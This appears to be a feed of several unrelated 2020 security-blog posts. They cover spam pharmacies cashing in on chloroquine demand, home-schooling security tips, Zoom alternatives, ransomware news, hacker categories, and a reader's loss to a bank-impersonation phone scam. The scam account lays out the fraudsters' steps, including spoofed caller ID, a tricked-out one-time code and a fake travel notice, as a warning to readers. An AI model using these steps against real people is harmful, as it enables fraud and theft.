KrebsOnSecurity reviewed a number of the most popular online pharmacy enterprises, in part by turning to some of the same accounts at these invite-only affiliate programs I relied upon for researching my 2014 book, Spam Nation: The Inside Story of Organized Cybercrime, from Global Epidemic to Your Front Door.

Many of these affiliate programs — going by names such as EvaPharmacy, Rx-Partners and Mailien/Alientarget — have been around for more than a decade, and were major, early catalysts for the creation of large-scale botnets and malicious software designed to enslave computers for the sending of junk email.

Their products do not require a prescription, are largely sourced directly from pharmaceutical production facilities in India and China, and are shipped via international parcel post to customers around the world.

In mid-March, two influential figures — President Trump and Tesla CEO Elon Muskbegan suggesting that hydroxychloroquine should be more strongly considered as a treatment for COVID-19.

The pharmacy affiliate programs immediately took notice of a major moneymaking opportunity, noting that keyword searches for terms related to chloroquine suddenly were many times more popular than for the other mainstays of their business.

“Everyone is hysterical,” wrote one member of the Russian language affiliate forum gofuckbiz[.]com on Mar. 17. “Time to make extra money. Do any [pharmacy affiliate] programs sell drugs for Coronavirus or flu?”

The larger affiliate programs quickly pounced on the opportunity, which turned out to be a major — albeit short-lived — moneymaker. Below is a screenshot of the overall product sales statistics for the previous 30 days from all affiliates of PharmCash. As we can see, Aralen — a chloroquine drug used to treat and prevent malaria — was the third biggest seller behind Viagra and Cialis.

Recent 30-day sales figures from the pharmacy affiliate program PharmCash.

In mid-March, the affiliate program Rx-Partners saw a huge spike in demand for Aralen and other drugs containing chloroquine phosphate, and began encouraging affiliates to promote a new set of product teasers targeting people anxiously seeking remedies for COVID-19.

Their main promotion page — still online at about-coronavirus2019[.]com — touts the potential of Aralen, generic hydroxychloroquine, and generic Kaletra/Lopinavir, a drug used to treat HIV/AIDS.

An ad promoting various unproven remedies for COVID-19, from the pharmacy affiliate program Rx-Partners.

On Mar. 18, a manager for Rx-Partners said that like PharmCash, drugs which included chloroquine phosphate had already risen to the top of sales for non-erectile dysfunction drugs across the program.

But the boost in sales from the global chloroquine frenzy would be short-lived. Demand for chloroquine phosphate became so acute worldwide that India — the world’s largest producer of hydroxychloroquine — announced it would ban exports of the drug. On Mar. 25, India also began shutting down its major international shipping ports, leaving the pharmacy affiliate programs scrambling to source their products from other countries.

A Mar. 31 message to affiliates working with the Union Pharm program, noting that supplies of Aralen had dried up due to the shipping closures in India.

India recently said it would resume exports of the drug, and judging from recent posts at the aforementioned affiliate site gofuckbiz[.]com, denizens of various pharmacy affiliate programs are anxiously awaiting news of exactly when shipments of chloroquine drugs will continue.

“As soon as India opens and starts mail, then we will start everything, so get ready,” wrote one of Rx-Partners’ senior recruiters. “I am sure that there will still be demand for pills.”

Global demand for these pills, combined with India’s recent ban on exports, have conspired to create shortages of the drug for patients who rely on it to treat chronic autoimmune diseases, including lupus and rheumatoid arthritis.

While hydroxychloroquine has long been considered a relatively safe drug, some people have been so anxious to secure their own stash of the drug that they’ve turned to unorthodox sources.

On March 19, Fox News ran a story about how demand for hydroxychloroquine had driven up prices on eBay for bottles of chloroquine phosphate designed for removing parasites from fish tanks. A week later, an Arizona man died and his wife was hospitalized after the couple ingested one such fish tank product in hopes of girding their immune systems against the Coronavirus.

Despite many claims that hydroxychloroquine can be effective at fighting COVID-19, there is little real data showing how it benefits patients stricken with the disease. The largest test of the drug’s efficacy against Coronavirus showed no benefit in a large analysis of its use in U.S. veterans hospitals. On the contrary, there were more deaths among those given hydroxychloroquine versus standard care, researchers reported.

In an advisory released today, the U.S. Food and Drug Administration (FDA) cautioned against use of hydroxychloroquine or chloroquine for COVID-19 outside of the hospital setting or a clinical trial due to risk of heart rhythm problems.

School #FromHome: The Challenges of Online Learning for Parents and Kids

School #FromHome: The Challenges of Online Learning for Parents and Kids

With classrooms closed and millions of kids faced with schooling at home, parents are wondering how do we make this work? If you’re asking yourself that question, you’re certainly not alone. Earlier this month, we conducted a study, Distance Learning Challenges. We reached out to 1,000 parents of kindergarten through twelfth-grade students in the U.S. and asked for their thoughts.

Our goal of the survey was to better understand what pressures parents are feeling, and we wanted to identify how we could possibly help, even if in some small way, as children take up going to class online. Here’s what parents had to say:

Home School Challenges

The Top Five Difficulties

Whether they have kindergarteners or high school seniors, parents are sharing many of the same pains. Across the board, they are:

1)      Keeping their children focused on schoolwork (instead of other online activities) – 50.31%

2)      Establishing a daily routine – 49.26%

3)      Balancing household responsibilities and teaching – 41.83%

4)      Establishing a wake-up and bedtime schedule – 33.40%

5)      Balancing working from home and teaching – 33.31%

Also making a strong showing were “help understanding the content to be taught,” at 33.20% and “reducing anxiety and depression due to real-world concerns,” at 31.58%.

Top Difficulties by Grade Level

There are nuances by grade level, however. Keeping children on task ranked first or second in all grade levels except for kindergarten, third grade, and twelfth grade. Instead, these parents cited “establishing a daily routine” as their top concern. For their number two concern, kindergarten and third grade students called out “balancing household responsibilities and teaching” as an issue.

Parents of twelfth graders were the only ones to list “reducing anxiety and depression due to real-world concerns” as their second topmost care, at 43%. This is a broad category, yet it includes overall worry about COVID-19, sick family members and friends, or separation from classmates. This is particularly understandable—senior year is one of milestones and leaps ahead in life, all of which have been upended by the need to stay home.

What Devices are Kids Using

Most parents in our survey said that their kids are using a device that’s already in the home. Some children may have their own device, or it may be a device that the family shares (which can introduce pressures of its own). A small percentage (15%) said their children use a device that was purchased specifically for home schooling purposes. Meanwhile, only about 33% of parents said that their child has a device provided by their school for free.

And what are they working on? It appears to be a mix of devices.

  • Laptop computers – 62%
  • Tablets – 40%
  • Desktop computers – 25%
  • 2-in-1 laptop computers – 15%

Helping Where We Can

Different states, cities, and individual schools are responding to the need for homeschooling in their own way, which means that the situation from family to family (or even child to child) will differ. The common thread is that we’re all learning how to manage our day and to make the best of learning at home in the most challenging of circumstances.

With that in mind, we’re producing a series of articles on School #FromHome, written in conjunction with educators who are facing the same challenges you are. Our aim is to offer you some specific advice and resources to help make it all easier as you determine what learning at home looks like for your child and your family. Look for these articles right here on the McAfee blog.


Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post School #FromHome: The Challenges of Online Learning for Parents and Kids appeared first on McAfee Blogs.

School #FromHome: Bring Structure to Your Day

protecting kids online

School #FromHome: Bring Structure to Your Day


Whether you’re a few weeks into a school closure or going on a few months now, you’re no doubt helping your school-aged children—and even your college kids—settle into a new routine that involves learning from home. Needless to say, it’s an adjustment for everyone as you and your children make the shift. As a parent, you might be feeling responsible for a range of academic responsibilities that go well beyond after-dinner homework help. In light of what we’re all facing, we reached out to a long-time educator for some specific advice about bringing structure to the school day at home.

While you’re probably accustomed to logging on to your school’s homework and grade-posting platform, what’s likely to be entirely new territory is monitoring regular emails from one to several, staff members, and coaches looping you in to help them make some type of learning happen from home for your children. We’re all a little overwhelmed already.


Parents told us just that. In our recent survey, the aspect of this new landscape they struggle with most is setting a routine, and it’s no wonder. The school day is a constant for all of us. It starts and ends at a certain time every day without fail. Bells at the exact same time each day signal the beginning, end, and all points in between including lunch at, you guessed it, the exact same time every day.

So why doesn’t this structure transfer easily to the home? It’s just a location change, right? School is social—a group effort—and it’s run by adults outside the home who set expectations, from where to be when the bell rings to how many minutes for breaks and lunches. Home is, well, home with its own set of expectations, rules, and freedoms plus a refrigerator and a TV and devices nearby and no bells except a morning alarm clock. Does it even make sense to try to bring the exact same structure to the home learning environment?


What if we saw this abrupt change as an opportunity to do things a different way? For example, school starts early for most high schoolers despite research that indicates later start times work better for teens. If your child doesn’t have a set schedule from the school, then you have the opportunity to set one that just might work better for your family. Students anywhere from late elementary school all the way to senior year can help set their own schedule (contingent upon other factors, of course, like helping with siblings or other family duties).

In all, setting a rhythm is key. A teenager experiencing a separation from friends is likely spending even more time online or on a device as a means to pass the time and connect with others. Their new rhythm might mean later nights and later bedtimes than normal. Letting your high school-aged student sleep in and start the at-home school day in late morning might give you some time to get your own work started and prepare for the day. If you’re sharing computers, printers, or other devices, letting your teenager sleep in makes it a bit easier to allocate time for yourself and others.


A middle school or high school aged student’s school day might work out better running from 10 a.m. to 2 p.m. with 15-minute breaks and up to a full hour for lunch. Bottom line: teenagers love freedom and choice. Letting them have some control over the timing of their school day, to the extent possible, may help keep them more engaged and focused. For example, middle schoolers may get as little as five minutes to pass from class to class. Why not offer 15 minutes between at-home classes? Many public schools allow 30 minutes for lunch. Home lunch might be an hour or maybe even a little more. During home lunch, maybe phones are out and kids have free time to eat, check their texts or social media, listen to a podcast or audiobook while they eat or just relax.

While most adolescents will sleep later given the chance, younger children might still be up early. Starting a learn-from-home-schedule on the earlier side for younger ones might alleviate late mornings spent vying for computer time. There’s no one perfect way to do this. It might work best to start school at 8 a.m. together at the kitchen table and then go about the day as your children do during the normal school year; however, it might work best to let the older kids sleep in while the younger ones enjoy a waffle and an audiobook, allowing you time to have your coffee, catch up on emails, and get ready for the day.


Khan Academy, the online educational service known best for its video tutorials, has created sample school day structures in direct response to the current school closures for learners in four age groups from preschool through 12th grade. Khan Academy’s Daily Schedules start all grade levels at 8 a.m., but older kids could easily adapt the basics of the schedule and start later in the morning.

In addition to the sample schedule, each age group chart links to grade-appropriate video tutorials in math—something Khan Academy is well known for—along with other opportunities for learning in almost all subject areas. If your child’s school is still in the process of formulating the specifics of its own from-home learning program, Khan Academy has a full day of learning options already mapped out. You might be surprised to see the breadth of offerings and the materials available to assist families during school closures.

For example, children in grades 3-5 start the day with short, interactive math videos for about 30 minutes followed by play time, ideally outside. Next up is 30 minutes of guided reading followed by silent reading. The rest of the day continues with small segments allotted for writing, grammar, lunch time, and even computer programming. Everything you need to complete the school from home day is available directly on the site or via links.

Another great resource is Scholastic, the education and publishing company well known for its school book fairs. Like Khan Academy, Scholastic’s newly created Learn From Home site also offers some structure to the school day arranged by grade level where you’ll find a wealth of books online plus supplemental videos for kindergarten through grade 9. For example, Week 1 material for a first grader is centered around five days of stories, each with a different focus: animal studies, weather, sound and music, farm life, and healthy bones. Each day’s area of focus offers audio and video stories, read-alongs, and supplemental videos for drawing and spelling—all connected to that day’s theme.

Both Khan Academy and Scholastic are two reputable sources. Yet there are plenty others, and it’s quite possible you’re seeing plenty of suggested resources–particularly if you’re searching for them online. When consulting these sources, be sure to do some research and make sure they’re reputable as well. Also, consider using browser protection that will protect you from any malicious links or malware-ridden downloads. Sad but true, there are those out there who are willing to take advantage of families who’re looking for online education resources during these times.


Teachers are experts at establishing routines, boundaries, and expectations for school work and behaviors. This is part of building the culture of the classroom, and it starts back at the beginning of the school year on day one. It’s no wonder children have a harder time settling into a routine and remaining focused on school at home. It’s not the easiest transfer of skills. In the adult world, for example, if you’re working from home, you may not structure your workday in the same way you would if you were actually at the office. The same applies for the kids.


Here are a few things you can do:

  • Look over the emails and announcements from your child’s school. What are the non-negotiables like online class meetings and due dates? Pencil those in.
  • Set a schedule like mentioned above, at least as a starting point. You can adjust and adapt it as needed, all with an eye toward what works for you and your family overall as you settle into your new routine.
  • The youngest children might have a hard time focusing for an online check-in with their kindergarten class but seeing their classmates online might be important socially with other options currently limited. If possible, try to make sure you help even your littlest ones make their meetings. Or even set up a digital playdate for them.
  • For older kids, online lessons are likely essential right now. Then, knowing your child best and asking for their input, you can be flexible in creating a daily routine that optimizes personal schedules, preferences, and family responsibilities.
  • Work together. In many households, family members may use a shared device to get everyone’s work and schooling done. Now’s a good time to set a schedule and make sure those shared devices are secure. and sharing of devices.

We hope we’ve offered you a few helpful resources for structuring an entire school day or adding to an existing structure, and that you might see some opportunities to benefit from a change in routine.  No doubt, we’re all adapting to the changes brought about by school closures, yet each family’s situation is different. Some days it just might not work out as planned, and that’s ok. The bottom line right now is flexibility and compromise, and it’s worth it to allow yourself a little grace as you find what works at your home.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.



The post School #FromHome: Bring Structure to Your Day appeared first on McAfee Blogs.

Rethinking Zoom? How WebEx, Teams, and Google Meet and Duo Compare on Privacy and Security

If you’re among the many looking for a new video conferencing tool after adding “zoombombing” to your vocabulary, you’re in luck. While a one-size-fits-all solution doesn’t exist, there are many other options with proven security features. Here’s a roundup of some of Zoom’s competitors and their privacy and security features.


The Webex video conference platform has been around since 1995 and is a favorite of the privacy-conscious health care, information technology, and financial services industries. This is partially due to the fact that all three industries commonly relied on virtual meetings well before the Covid-19 pandemic, but mostly because Webex has a reputation for maintaining robust cybersecurity. Cisco, its parent company, is an industry leader in network hardware, software, and security products.

Webex offers end-to-end encryption. Using it, however, limits popular video options, including remote computer sharing and personal meeting rooms. Worth noting: Webex and Cisco products have had security issues in the past.

Microsoft Teams

Like Zoom, Microsoft Teams experienced an uptick in the recent crisis, in part due to its integration with the company’s flagship Office365 cloud and productivity services. Microsoft says that Teams are encrypted “in transit and at rest,” but details about support for end-to-end encryption are vague.

Like Webex, one advantage of Teams is that its parent company is a major provider of networking, software, and cybersecurity services. Microsoft has an internal rating system for the security of its products, and has designated Teams to be Tier-D compliant, which means that it can adhere to the strictest government and industry security standards and legal requirements.

Neither Microsoft nor Teams are immune to security vulnerabilities, but as a company, Microsoft’s bandwidth to address them when they occur is probably unparalleled. Microsoft also has a more transparent privacy policy and a better track record when it comes to protecting user and customer data than many of its competitors, including Zoom.

Google Hangouts/Google Duo

Google offers Hangouts and Duo as its two primary video meeting platforms–both offer “free” and paid versions bundled in with its G Suite line of applications. While Google Hangouts offers similar functionality to Zoom, it has a limit of 25 attendees per video conference. Other considerations include a long history of security and privacy concerns and the fact that Google Hangouts don’t offer end-to-end encryption.

Duo is end-to-end encrypted, and can support video meetings with up to 12 attendees.

Like Cisco and Microsoft, Google has more resources dedicated to cybersecurity, but the company has a lengthy track record of mining user data, especially for “free” services. The company is also notorious for quickly and unceremoniously dropping support for many of its projects, and has done so with several previous video conferencing and meeting apps.

Is Zoom Worth Sticking With?

It depends on your business needs. Zoom’s rapid increase in popularity in an already crowded market is a testament to its many qualities, features, and ease of use.

The company has made some misleading claims about user privacy and data, and the recent discovery of multiple serious security vulnerabilities will test the company’s ability to support and sustain its user base.

A good sign is that Zoom announced a 90-day freeze on any new features so it can focus on security and privacy issues. This move could help the platform and the company to continue the meteoric rise in the number of people using the service.

For industries with stringent data privacy and security requirements, platforms like Webex or Microsoft Teams may be a better fit, but every company, platform, and technology has its own set of drawbacks and vulnerabilities. The main takeaway is that every company, regardless of size, needs to have a solid understanding of what its own internal security needs are in order to make an informed decision.

The post Rethinking Zoom? How WebEx, Teams, and Google Meet and Duo Compare on Privacy and Security appeared first on Adam Levin.

School from Home: “Square One” Basics

 School #FromHome: “Square One” Basics

With many schools around the globe postponing classes for long stretches or closing school outright for the rest of the academic year, the challenge of parenting just cranked up. After all, there’s no more schoolhouse—it’s your house. Whether you’re the parent of a kindergartener or a high school senior, or have a mix of children in between, there’s a good chance you’re trying to figure out how to continue learning online at home—while also dealing with the disappointments of missing friends, activities, and major events like sports, proms, and even graduations. It’s not easy, and without a doubt this is new to all of us.

We want to make it easier for you, even if it’s in some small ways. We started by asking you what roadblocks are getting in the way. This April, we reached out to parents across the U.S. and asked  . Your top two answers came across loud and clear: you’re struggling with establishing a routine and keeping children focused.

Looking for resources and ideas for bringing a little structure into online learning at home and how that fits into your day? We have you covered, so let’s start at square one—making sure that your online learning environment at home is secure.

 Start with a look at your devices

First, determine which device your child is going to use. Some school districts provide students with a laptop that the students keep for the school year. The security on these devices will more than likely be managed centrally by the school district. Thus, they’ll have their own security software and settings already in place. Moreover, such a centrally managed device will likely be limited in terms of which settings can be updated and what software can be added. If your child has a school-issued device, follow the advice of the school and its IT admin on matters of security tools and software. And if you have questions about security, reach out to them.

Security basics on your home computer and laptop

If your child is using a home computer or laptop, or sharing one with other members of the family, you’ll want to ensure that it’s protected. This includes a full security suite that features more than just anti-virus, but also firewall protection to keep hackers at bay, safe browsing tools that steer you clear of sketchy or unsafe websites, and perhaps even parental controls to block distracting apps and inappropriate websites. Another smart option is to use a password manager. There’s a good chance that you kids will need to create new accounts for new learning resources—and with those come new usernames and passwords. A password manager will organize them and keep them safe.

Video conferencing

Additionally, you’ll want to take a very close look at the video conferencing tools that your child might be using to connect with teachers and classmates (and even their friends after schooltime is over). First off, there are plenty of them out there. Secondly, some video conferencing tools have allegedly experienced security and privacy issues in recent weeks. Before downloading and installing a video conferencing tool, do a little online research to see how secure it is and what privacy policies it has in place.

Look for video conferencing tools that use end-to-end encryption so that the conference is protected from prying eyes and so that others can’t intrude upon the conversation uninvited. Look for articles from reputable sources too, as there have been further reports of privacy issues where certain user information has been shared with third parties while using the video conferencing tool. That’s good advice for any software, apps, or tools you may wish to add.

Use a VPN

Another way to protect yourself from intrusions while conferencing, or doing anything else online for that matter, is to introduce a VPN (virtual private network). Choose one that uses bank-level encryption to keep your personal data and activities private from hackers. It will also hide other information, like account credentials, credit card numbers, and the like. It’s a good move, and it’s easy to use.

Next up

Look for our upcoming articles where we’ll share some specific ideas that can help make homeschooling online a little easier.

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.




The post School from Home: “Square One” Basics appeared first on McAfee Blogs.

Cyber News Rundown: Ransomware Hits LA Suburbs

Reading Time: ~ 2 min.

Los Angeles Suburb Hit with Ransomware

Last month, the City of Torrance, California fell victim to a ransomware attack that shut down many of their internal systems and demanded 100 Bitcoins to not publish the stolen data. Along with the roughly 200GB of data it stole from the city, the DoppelPaymer ransomware also deleted all local backups and encrypted hundreds of workstations. At this time, it’s uncertain whether the City of Torrance has chosen to pay the ransom, as the malware authors seem to have diligently removed any means for the City to recuperate on their own.

Malicious Packages Hidden Within Popular File Repository

Over 700 malicious packages have been discovered within the RubyGems main program and file repository. These originated from just two accounts and were uploaded over a single week period in late February. Between them, the many packages have a combined download number of over 100,000, most of which included a cryptocurrency script that could identify and intercept cryptocurrency transactions being made on Windows® devices. While this isn’t the first time malicious actors have used open source file repositories to distribute malicious payloads, this infiltration of an official hub for such a long period of time speaks to the lack of security within these types of systems.

Maze Ransomware Targets Cognizant ISP

Late last week, the Maze Ransomware group took aim at New Jersey-based internet service provider, Cognizant, and took down a significant portion of their internal systems. The attack occurred just a day after the removal of a dark web post that offered access to an IT company’s systems for $200,000. It had been listed for nearly a week. While Cognizant has already begun contacting its customers about the attack, the true extent of the damage remains unclear.

COVID-19 Scams Net $13 Million

The Federal Trade Commission recently released statistics on the number of complaints they’ve received specifically related to the COVID-19 pandemic: it’s over 17,000 in just a three-month period. While this number is assuredly less than the actual number of COVID-19 related scams, these reported complaints have resulted in a sum of over $13 million in actual losses, ranging from fraudulent payments to travel cancellations and refunds. Additionally, the FTC was able to catalogue over 1,200 COVID-19 related scam calls reported by people on the Do Not Call list.

Customer Data Stolen from Fitness App

A database belonging containing 40GB of personally identifiable information on thousands of customers of the fitness app, Kinomap, was found unsecured. Containing a total of 42 million records, the database remained accessible for nearly 2 weeks after the company was informed. It was only secured at last after French data protection officials were notified. Kinomap API keys were also among the exposed data, which would have allowed malicious visitors to hijack user accounts and steal any available data.

The post Cyber News Rundown: Ransomware Hits LA Suburbs appeared first on Webroot Blog.

The Truth about Hackers, in Black and White (and Grey)

Reading Time: ~ 4 min.

Did you know there are three primary types of hacker—white hats, black hats, and grey hats—and that there are subcategories within each one? Despite what you may have heard, not all hackers have intrinsically evil goals in mind. In fact, there are at least 300,000 hackers throughout the world who have registered themselves as white hats.

Also known as ethical hackers, white hats are coders who test internet systems to find bugs and security loopholes in an effort to help organizations lock them down before black hat hackers, i.e. the bad guys, can exploit them. Black hats, on the other hand, are the ones we’re referring to when we use words like “cybercriminal” or “threat actor.” These are hackers who violate computer security and break into systems for personal or financial gain, destructive motives, or other malicious intent.

The last of the three overarching types, grey hat hackers, are the ones whose motives are, well, in a bit of a grey area. Similar to white hats, grey hats may break into computer systems to let administrators know their networks have exploitable vulnerabilities that need to be fixed. However, from there, there’s nothing really stopping them from using this knowledge to extort a fee from the victim in exchange for helping to patch the bug. Alternatively, they might request a kind of finder’s fee. It really depends on the hacker.

So, hackers can be “good guys”?

Yes, they absolutely can.

In fact, there’s even an argument that black hats, while their motivations may be criminal in nature, are performing a beneficial service. After all, each time a massive hack occurs, the related programs, operating systems, businesses, and government structures are essentially shown where and how to make themselves more resilient against future attacks. According to Keren Elezari, a prominent cybersecurity analyst and hacking researcher, hackers and hacktivists ultimately push the internet and technology at large to become stronger and healthier by exposing vulnerabilities to create a better world.

Why do they hack?

The shortest, simplest answer: for the money.

While white and grey hat hackers have altruistic motives in mind and, at least in the former group, are invested in ensuring security for all, the fact of the matter is that there’s a lot of money to be made in hacking. The average Certified Ethical Hacker earns around $91,000 USD per year. Additionally, to help make their products and services more secure, many technology companies offer significant bounties to coders who can expose vulnerabilities in their systems. For example, Apple offered a reward of $1.5 million USD last year to anyone who could hack an iPhone to find a serious security flaw. There are even groups, such as HackerOne, which provide bug bounty platforms that connect businesses with ethical hackers and cybersecurity researchers to perform penetration testing (i.e. finding vulnerabilities). Multiple hackers on the HackerOne bug bounty platform have earned over $1 million USD each.

And for black hats, theft, fraud, extortion, and other crimes can pay out significantly more. In fact, some black hats are sponsored by governments (see the Nation-State category below).

You mentioned subtypes. What are they?

As with many groups, there’s a wide range of hacker personas, each with different motivations. Here are a few of the basic ones you’re likely to encounter.

Script Kiddies

When you picture the stereotypical “hacker in a hoodie”, you’re thinking of a Script Kiddie. Script Kiddies are programming novices who have at least a little coding knowledge but lack expertise. Usually, they get free and open source software on the dark web and use it to infiltrate networks. Their individual motives can place them in black, white, or grey hat territory.


Ever hear of a group of hackers called Anonymous? They’re a very well-known example of a hacktivist group who achieved notoriety when they took down the CIA’s website. Hacktivists are grey hat hackers with the primary goal of bringing public attention to a political or social matter through disruption. Two of the most common hacktivist strategies are stealing and exposing sensitive information or launching a denial of service (DDoS) attack.

Red Hats

Red hats are sort of like grey hats, except their goal is to block, confound, or straight-up destroy the efforts of black hat hackers. Think of them like the vigilantes of the hacker world. Rather than reporting breaches, they work to shut down malicious attacks with their own tools.


Remember earlier in this post when we mentioned that some black hats are sponsored by governments? That would be this group. Nation-state hackers are ones who engage in espionage, social engineering, or computer intrusion, typically with the goal of acquiring classified information or seeking large ransoms. As they are backed by government organizations, they are often extremely sophisticated and well trained.

Malicious Insiders

Perhaps one of the more overlooked threats to a business is the malicious insider. An insider might be a current or former employee who steals or destroys information, or it might be someone hired by a competitor to infiltrate an organization and pilfer trade secrets. The most valuable data for a malicious insider is usernames and passwords, which can then be sold on the dark web to turn a hefty profit.

What are your next steps?

Now that you better understand the hacker subtypes, you can use this information to help your organization identify potential threats, as well as opportunities to actually leverage hacking to protect your business. And if you haven’t already, check out our Lockdown Lessons, which include a variety of guides, podcasts, and webinars designed to help MSPs and businesses stay safe from cybercrime.

Beyond the educational steps you’re taking, you also need to ensure your security stack includes a robust endpoint protection solution that uses real-time threat intelligence and machine learning to prevent emerging attacks. Learn more about Webroot® Business Endpoint Protection or take a free trial here.

The post The Truth about Hackers, in Black and White (and Grey) appeared first on Webroot Blog.

Isolation Idea – 1,001 Albums You Must Hear Before You Die

I saw a post from a colleague about a book he had called 1,001 Albums You Must Hear Before You Die. Loving music I was intrigued regardless but I decided to buy the hard copy of the book and turn it into an isolation activity. I am glad I did.

The post Isolation Idea – 1,001 Albums You Must Hear Before You Die appeared first on Binary Blogger.

When in Doubt: Hang Up, Look Up, & Call Back

Many security-conscious people probably think they’d never fall for a phone-based phishing scam. But if your response to such a scam involves anything other than hanging up and calling back the entity that claims to be calling, you may be in for a rude awakening. Here’s how one security and tech-savvy reader got taken for more than $10,000 in an elaborate, weeks-long ruse.

Today’s lesson in how not to get scammed comes from “Mitch,” the pseudonym I picked for a reader in California who shared his harrowing tale on condition of anonymity. Mitch is a veteran of the tech industry — having worked in security for several years at a fairly major cloud-based service — so he’s understandably embarrassed that he got taken in by this confidence scheme.

On Friday, April 17, Mitch received a call from what he thought was his financial institution, warning him that fraud had been detected on his account. Mitch said the caller ID for that incoming call displayed the same phone number that was printed on the back of his debit card.

But Mitch knew enough of scams to understand that fraudsters can and often do spoof phone numbers. So while still on the phone with the caller, he quickly logged into his account and saw that there were indeed multiple unauthorized transactions going back several weeks. Most were relatively small charges — under $100 apiece — but there were also two very recent $800 ATM withdrawals from cash machines in Florida.

If the caller had been a fraudster, he reasoned at the time, they would have asked for personal information. But the nice lady on the phone didn’t ask Mitch for any personal details. Instead, she calmly assured him the bank would reverse the fraudulent charges and said they’d be sending him a new debit card via express mail. After making sure the representative knew which transactions were not his, Mitch thanked the woman for notifying him, and hung up.

The following day, Mitch received another call about suspected fraud on his bank account. Something about that conversation didn’t seem right, and so Mitch decided to use another phone to place a call to his bank’s customer service department — while keeping the first caller on hold.

“When the representative finally answered my call, I asked them to confirm that I was on the phone with them on the other line in the call they initiated toward me, and so the rep somehow checked and saw that there was another active call with Mitch,” he said. “But as it turned out, that other call was the attackers also talking to my bank pretending to be me.”

Mitch said his financial institution has in the past verified his identity over the phone by sending him a one-time code to the cell phone number on file for his account, and then asking him to read back that code. After he hung up with the customer service rep he’d phoned, the person on the original call said the bank would be sending him a one-time code to validate his identity.

Now confident he was speaking with a representative from his bank and not some fraudster, Mitch read back the code that appeared via text message shortly thereafter. After more assurances that any additional phony charges would be credited to his account and that he’d be receiving a new card soon, Mitch was annoyed but otherwise satisfied. He said he checked his account online several times over the weekend, but saw no further signs of unauthorized activity.

That is, until the following Monday, when Mitch once again logged in and saw that a $9,800 outgoing wire transfer had been posted to his account. At that point, it dawned on Mitch that both the Friday and Saturday calls he received had likely been from scammers — not from his bank.

Another call to his financial institution and some escalation to its fraud department confirmed that suspicion: The investigator said another man had called in on Saturday posing as Mitch, had provided a one-time code the bank texted to the phone number on file for Mitch’s account — the same code the real Mitch had been tricked into giving up — and then initiated an outgoing wire transfer.

It appears the initial call on Friday was to make him think his bank was aware of and responding to active fraud against his account, when in actuality the bank was not at that time. Also, the Friday call helped to set up the bigger heist the following day.

Mitch said he and his bank now believe that at some point his debit card and PIN were stolen, most likely by a skimming device planted at a compromised point-of-sale terminal, gas pump or ATM he’d used in the past few weeks. Armed with a counterfeit copy of his debit card and PIN, the fraudsters could pull money out of his account at ATMs and go shopping in big box stores for various items. But to move lots of money out of his account all at once, they needed Mitch’s help.

To make matters worse, the fraud investigator said the $9,800 wire transfer had been sent to an account at an online-only bank that also was in Mitch’s name. Mitch said he didn’t open that account, but that this may have helped the fraudsters sidestep any fraud flags for the unauthorized wire transfer, since from the bank’s perspective Mitch was merely wiring money to another one of his accounts. Now, he’s facing the arduous task of getting identity theft (new account fraud) cleaned up at the online-only bank.

Mitch said that in retrospect, there were several oddities that should have been additional red flags. For one thing, on his outbound call to the bank on Saturday while he had the fraudsters on hold, the customer service rep asked if he was visiting family in Florida.

Mitch replied that no, he didn’t have any family members living there. But when he spoke with the bank’s fraud department the following Monday, the investigator said the fraudsters posing as Mitch had succeeded in adding a phony “travel notice” to his account — essentially notifying the bank that he was traveling to Florida and that it should disregard any geographic-based fraud alerts created by card-present transactions in that region. That would explain why his bank didn’t see anything strange about their California customer suddenly using his card in Florida.

Also, when the fake customer support rep called him, she stumbled a bit when Mitch turned the tables on her. As part of her phony customer verification script, she asked Mitch to state his physical address.

“I told her, ‘You tell me,’ and she read me the address of the house I grew up in,” Mitch recalled. “So she was going through some public records she’d found, apparently, because they knew my previous employers and addresses. And she said, ‘Sir, I’m in a call center and there’s cameras over my head. I’m just doing my job.’ I just figured she was just new or shitty at her job, but who knows maybe she was telling the truth. Anyway, the whole time my girlfriend is sitting next to me listening to this conversation and she’s like, ‘This sounds like bullshit.'”

Mitch’s bank managed to reverse the unauthorized wire transfer before it could complete, and they’ve since put all the stolen funds back into his account and issued a new card. But he said he still feels like a chump for not observing the golden rule: If someone calls saying they’re from your bank, just hang up and call them back — ideally using a phone number that came from the bank’s Web site or from the back of your payment card. As it happened, Mitch only followed half of that advice.

What else could have made it more difficult for fraudsters to get one over on Mitch? He could have enabled mobile alerts to receive text messages anytime a new transaction posts to his account. Barring that, he could have kept a closer eye on his bank account balance.

If Mitch had previously placed a security freeze on his credit file with the three major consumer credit bureaus, the fraudsters likely would not have been able to open a new online checking account in his name with which to receive the $9,800 wire transfer (although they might have still been able to wire the money to another account they controlled).

As Mitch’s experience shows, many security-conscious people tend to focus on protecting their online selves, while perhaps discounting the threat from less technically sophisticated phone-based scams. In this case, Mitch and his bank determined that his assailants never once tried to log in to his account online.

“What’s interesting here is the entirety of the fraud was completed over the phone, and at no time did the scammers compromise my account online,” Mitch said. “I absolutely should have hung up and initiated the call myself. And as a security professional, that’s part of the shame that I will bear for a long time.”

Further reading:

Voice Phishing Scams are Getting More Clever
Why Phone Numbers Stink as Identity Proof
Apple Phone Phishing Scams Getting Better
SMS Phishing + Cardless ATM = Profit

Computer-Based Training: April 2020 Release in Review

As IT systems expand in their complexity, ensuring security diligence becomes increasingly challenging. More importantly, the need for job-specific guidance becomes critical for all those involved in the secure building and operating of them, whether in Program/Project Management and Acquisition, Network Services, Systems Architecture, Development, Risk Management, or even Threat Analysis. 

Ensuring Data Security with Business Process Outsourcing Companies

The business processing outsourcing industry is known for generating savings and top-quality services for their clients. Enterprises in the West started the trend and has since relied on the East for their operations. 

From its beginnings in manufacturing and call centres, the industry has widened its offerings to accounting, human resources, and even professional services. This gives way to the rise of high-value outsourcing, including research and development and other innovation strategies getting outsourced. Affordable high-quality technology also made it possible for small and medium businesses to try it.

Despite its popularity, many businesses worry about the risks of outsourcing their projects to a low-cost country. This includes data and cybersecurity concerns and how these companies handle it. 

Most BPO companies follow the data and compliance standards set by institutions such as ISO and HIPAA. Even when working remotely, they make sure that these standards and processes are followed.

